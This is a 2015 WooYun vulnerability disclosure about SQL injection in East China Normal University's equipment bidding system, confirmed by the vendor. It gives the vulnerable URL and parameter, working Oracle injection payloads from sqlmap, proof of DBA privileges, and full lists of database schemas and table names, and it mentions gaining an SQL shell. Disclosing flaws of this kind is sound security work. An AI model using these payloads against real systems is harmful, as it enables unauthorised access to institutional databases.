当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0158640

漏洞标题:华东师范大学某系统SQL注入#DBA权限#获取sql-shell

相关厂商:华东师范大学

漏洞作者: 路人甲

提交时间:2015-12-07 12:40

修复时间:2016-01-21 14:10

公开时间:2016-01-21 14:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-07: 细节已通知厂商并且等待厂商处理中
2015-12-07: 厂商已经确认,细节仅向厂商公开
2015-12-17: 细节向核心白帽子及相关领域专家公开
2015-12-27: 细节向普通白帽子公开
2016-01-06: 细节向实习白帽子公开
2016-01-21: 细节向公众公开

简要描述:

如题

详细说明:

看到漏洞有这个网站的、但搜了一下关键字、没搜到应该是没提交过的
0x01 漏洞位置

华东师范大学设备竞价系统


0x02 漏洞具体

http://jingjia.ecnu.edu.cn/sggl/wsjj/ggztDetails.jsp?WID=1


0x03 漏洞利用方式

sqlmap

漏洞证明:

0x04 漏洞证明

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: WID
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: WID=1' AND 1357=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1357=1357) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113)) AND 'VMng'='VMng
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: WID=1' UNION ALL SELECT NULL,CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||CHR(103)||CHR(68)||CHR(81)||CHR(71)||CHR(97)||CHR(73)||CHR(82)||CHR(106)||CHR(103)||CHR(81)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113),NULL FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: WID=1' AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(116)||CHR(114)||CHR(98),5) AND 'FeZB'='FeZB
---
[13:47:01] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle


发现是DBA权限

[13:44:57] [INFO] testing if current user is DBA
[13:44:57] [WARNING] reflective value(s) found and filtering out
current user is DBA: True


数据库全部信息

available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HSD_ZJK
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] ZC
[*] ZC20110430
[*] ZC20140731
[*] ZC_TEST
[*] ZCTEST


表信息

Database: ZC
[320 tables]
+--------------------+
| AQCHEN_338 |
| AQCHEN_GXJJ_YQDC |
| AQCHEN_ORG01 |
| AQCHEN_T_SB |
| A_TMP_BH |
| E$_ZC_BM_TEMP |
| E$_ZC_JFB_TEMP |
| E$_ZC_JFKMYE_TEMP |
| E$_ZC_YH_TEMP |
| I$_ZC_BM_TEMP_LOG |
| I$_ZC_JFB_TEMP_LOG |
| I$_ZC_YH_TEMP_LOG |
| PLAN_TABLE |
| RY |
| RYLX |
| SNP_CHECK_TAB |
| SYS_KFRWGL |
| SYS_RYGL |
| T_JCSJ_DM |
| T_XTGL_SJB |
| T_XTGL_SJBZD |
| XLLX |
| ZCLX |
| ZC_AZDD |
| ZC_BDLX |
| ZC_BDSQBDYY |
| ZC_BDSQD |
| ZC_BDSQKP |
| ZC_BDSQLB |
| ZC_BDXZ |
| ZC_BFPC |
| ZC_BH2SYS_DW |
| ZC_BH2SYS_KCK |
| ZC_BH2SYS_RY |
| ZC_BH2SYS_SJ6 |
| ZC_BH2SYS_SJ7 |
| ZC_BH2SYS_SYMC |
| ZC_BH2SYS_SYXM |
| ZC_BHDZ_BDK |
| ZC_BHDZ_ZJK |
| ZC_BHJJ_BDK |
| ZC_BHJJ_ZJK |
| ZC_BHSB_BDK |
| ZC_BHSB_FJK |
| ZC_BHSB_ZJK |
| ZC_BLZT |
| ZC_BLZTPZ |
| ZC_BM |
| ZC_BMNDJC |
| ZC_BMNDJCCXTJ |
| ZC_BM_20151019 |
| ZC_BM_TEMP |
| ZC_BZD |
| ZC_BZDJFLY |
| ZC_BZDMS |
| ZC_BZDPTCX |
| ZC_BZDPZ |
| ZC_CWRECORD_TEMP |
| ZC_CWZJDJD |
| ZC_CZBMBPZ |
| ZC_CZBZCDL |
| ZC_CZBZCFL |
| ZC_DMZHB |
| ZC_DQKPXX |
| ZC_DQKPXXM200912 |
| ZC_DQKPXXM201012 |
| ZC_DQKPXXM201112 |
| ZC_DQKPXXM201208 |
| ZC_DQKPXXM201212 |
| ZC_DQKPXXM201308 |
| ZC_DQKPXXM201312 |
| ZC_DQKPXXM201408 |
| ZC_DQKPXXM201412 |
| ZC_DQKPXXM201508 |
| ZC_DXQY_GG |
| ZC_DXYQDWFW |
| ZC_DXYQJZRY |
| ZC_DXYQXX |
| ZC_DXYQ_CEJL |
| ZC_DXYQ_CEPJ |
| ZC_DXYQ_DJCSCSSJ |
| ZC_DXYQ_FL |
| ZC_DXYQ_FMZL |
| ZC_DXYQ_HJQK |
| ZC_DXYQ_KFSJD |
| ZC_DXYQ_KFSJDFA |
| ZC_DXYQ_KJCG |
| ZC_DXYQ_LWQK |
| ZC_DXYQ_NDKHB |
| ZC_DXYQ_PXQK |
| ZC_DXYQ_RJH |
| ZC_DXYQ_SC |
| ZC_DXYQ_YJH |
| ZC_DXYQ_YYD |
| ZC_DXYQ_YYDDCYP |
| ZC_DXYQ_YYDYYSJ |
| ZC_DXYQ_YYZTXGJL |
| ZC_DXYQ_ZJH |
| ZC_DXYQ_ZJHMX |
| ZC_EXPORTLIST |
| ZC_FCBZ |
| ZC_FCBZPZ |
| ZC_FCMJ |
| ZC_FCPZ |
| ZC_FCPZBZ |
| ZC_FCPZDL |
| ZC_FCPZXL |
| ZC_FIELDOFTABLE |
| ZC_FJ |
| ZC_FJJY |
| ZC_FJJYKP |
| ZC_FJJYSQ |
| ZC_FJJYSQKP |
| ZC_FJSY |
| ZC_GBZCDL |
| ZC_GBZCFL |
| ZC_GGDMCXTJ |
| ZC_GJDL |
| ZC_GJXL |
| ZC_GNCD |
| ZC_HMDYH |
| ZC_JFB |
| ZC_JFB_TEMP |
| ZC_JFFP |
| ZC_JFKMYE |
| ZC_JFKMYE_TEMP |
| ZC_JFLY |
| ZC_JFYS |
| ZC_JFYSLS |
| ZC_JFZD |
| ZC_JFZKK |
| ZC_JFZL |
| ZC_JGYQSYXY |
| ZC_JKDJB |
| ZC_JKDLGS |
| ZC_JKSBBLQK |
| ZC_JS |
| ZC_JSGNQX |
| ZC_JWZCFL |
| ZC_JYJL |
| ZC_JYSQD |
| ZC_KPBDXX |
| ZC_KPMS |
| ZC_KPPZ |
| ZC_KPTJBB |
| ZC_KPTJBBCX |
| ZC_KPXX |
| ZC_KPXX_QCPC |
| ZC_KPXX_SJTXJD |
| ZC_LC |
| ZC_LCJD |
| ZC_LSBZD |
| ZC_LSBZDJFLY |
| ZC_LSJFLY |
| ZC_LSKPXX |
| ZC_LSSGD |
| ZC_LSSGDJFLY |
| ZC_PDHZB |
| ZC_PDJL |
| ZC_PDSJLSB |
| ZC_PEDL |
| ZC_PEPZ |
| ZC_PETJ |
| ZC_PEXL |
| ZC_PJJB |
| ZC_QCPKB |
| ZC_QCPYB |
| ZC_QCSBPZB |
| ZC_QXCXTJ |
| ZC_RWCX |
| ZC_RWSJ |
| ZC_RWSJX |
| ZC_RWZX |
| ZC_RWZXBM |
| ZC_RWZXJD |
| ZC_RY |
| ZC_RYLX |
| ZC_SBBB |
| ZC_SBBBCXTJ |
| ZC_SBBBPZ |
| ZC_SBBBZT |
| ZC_SBBDXZ |
| ZC_SBBDYY |
| ZC_SBD |
| ZC_SBKP |
| ZC_SBQG |
| ZC_SBSJTXJD |
| ZC_SGCYWP |
| ZC_SGD |
| ZC_SGDCGY |
| ZC_SGDJFLY |
| ZC_SGDMS |
| ZC_SGDPZ |
| ZC_SGHT |
| ZC_SGHTFKQK |
| ZC_SGHTJFLY |
| ZC_SGHTPZ |
| ZC_SGHTXGSGD |
| ZC_SGSCDY |
| ZC_SGZB |
| ZC_SGZBFB |
| ZC_SGZBJJD |
| ZC_SGZBJJDMX |
| ZC_SGZBXGSGD |
| ZC_SGZBXGSGD_LSB |
| ZC_SGZBXGSGD_XG |
| ZC_SGZB_BLQK |
| ZC_SGZB_CGPS |
| ZC_SGZB_JDLB |
| ZC_SGZB_JG |
| ZC_SGZB_PBJDZ |
| ZC_SGZB_PBMXXX |
| ZC_SGZB_PBZJ |
| ZC_SGZB_PBZJZ |
| ZC_SGZB_PBZJ_CGXM |
| ZC_SGZB_PBZJ_ZZLW |
| ZC_SGZB_PFB |
| ZC_SGZB_PFBF |
| ZC_SGZB_PFFA |
| ZC_SGZB_PFFA_PFBF |
| ZC_SGZB_TBXX |
| ZC_SGZB_ZHDFB |
| ZC_SHZCFL |
| ZC_SJDX |
| ZC_SJSJRW |
| ZC_SJZD |
| ZC_SJZDBM |
| ZC_SYSGLCXTJ |
| ZC_SYSGLSJ |
| ZC_SYSGLSJMS |
| ZC_SYSKP |
| ZC_SYSKPMS |
| ZC_SYSKPZX |
| ZC_TJBBPZCS |
| ZC_TSHJY |
| ZC_TYBMS |
| ZC_WPCK |
| ZC_WPCKD |
| ZC_WPCKDMX |
| ZC_WPFKDJD |
| ZC_WPFKLYSQD |
| ZC_WPFL |
| ZC_WPFL_TEMP |
| ZC_WPGYDW |
| ZC_WPKC |
| ZC_WPLYSQD |
| ZC_WPLYSQDMX |
| ZC_WPRKD |
| ZC_WPRKDMX |
| ZC_WPRKSQD |
| ZC_WPRKSQDMX |
| ZC_WPSYDJD |
| ZC_WPXX |
| ZC_WPXX_IMP |
| ZC_WPYDJC |
| ZC_WPYDJCMX |
| ZC_WXJL |
| ZC_WXJLKP |
| ZC_WXJLMX |
| ZC_WXSQD |
| ZC_XLLX |
| ZC_XQ |
| ZC_XTCS |
| ZC_XTCS_CLOB |
| ZC_XTGG |
| ZC_XTGGCX |
| ZC_XTGGLM |
| ZC_XTRZ |
| ZC_XTRZ_HISTORY |
| ZC_XTRZ_OPERATE |
| ZC_XTRZ_PZXX |
| ZC_XX |
| ZC_XXBMBM |
| ZC_XXTZ |
| ZC_XXTZ_LS |
| ZC_YH |
| ZC_YHBBQX |
| ZC_YHBMQX |
| ZC_YHBMQXCX |
| ZC_YHXQQX |
| ZC_YHZ |
| ZC_YHZCLXQX |
| ZC_YHZSHJS |
| ZC_YH_TEMP |
| ZC_YQLJ |
| ZC_YSTZ |
| ZC_YSXX |
| ZC_YSXXZQTZ |
| ZC_YSZT |
| ZC_YW |
| ZC_YWBM_SPBEAN |
| ZC_YWDBR |
| ZC_YWDBRSZLOG |
| ZC_YWFJ |
| ZC_YWFJFL |
| ZC_YWFL_BLOB |
| ZC_YWLZ |
| ZC_YWLZGJDCLR |
| ZC_YWLZRZ |
| ZC_YWMXXMCLQK |
| ZC_YXBM |
| ZC_YXJFLY |
| ZC_ZC |
| ZC_ZCBZCXTJ |
| ZC_ZCDL |
| ZC_ZCDLJGXZ |
| ZC_ZCFL |
| ZC_ZCFL1 |
| ZC_ZCGYS |
| ZC_ZCGYSNS |
| ZC_ZCGYSPJ |
| ZC_ZCLX |
| ZC_ZCPTYH |
| ZC_ZCSX |
| ZC_ZDPZ |
| ZC_ZFBKD |
| ZC_ZFJFB |
| ZC_ZFPZ |
| ZWLX |
| ZWLX2 |
+--------------------+


获取sql-shell

7N%~)9RN3_{H(4HXP0WS$ZL.png

修复方案:

我觉得该换系统了

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-07 14:07

厂商回复:

通知二级单位处理。

最新状态:

暂无


漏洞评价:

评价